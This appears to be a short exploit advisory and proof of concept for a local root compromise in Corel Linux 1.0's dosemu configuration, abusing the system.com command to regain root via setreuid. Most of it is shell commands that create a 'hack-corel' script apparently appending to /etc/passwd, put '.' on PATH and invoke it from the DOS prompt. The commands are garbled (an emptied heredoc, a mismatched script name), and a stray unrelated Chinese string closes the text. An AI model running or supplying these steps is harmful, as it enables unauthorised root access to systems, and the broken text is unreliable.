# # # suid@suid.kg - Corel Linux dosemu config error. Local root compromise. # # Software: Corel Linux 1.0 dosemu distribution configuration # URL: http://linux.corel.com # Version: Version 1.0 # # The system.com command is available to any user who runs the # dos emulator. This is a direct violation of the advice from # the SECURITY readme file: # # Never allow the 'system.com' command (part of dosemu) # to be executed. It makes dosemu execute the libc # 'system() function'. Though privileges are turned off, # the process inherits the switched uid-setting (uid=root, # euid=user), hence the unix process can use setreuid to # gain root access back. ... the rest you can imagine your self. # id cat > hack-corel <> /etc/passwd EOF chmod a+rx hack-corel export PATH="$PATH:." dos echo "when you hit a C:\ prompt, type 'system hack-core'"

亚洲欧美在线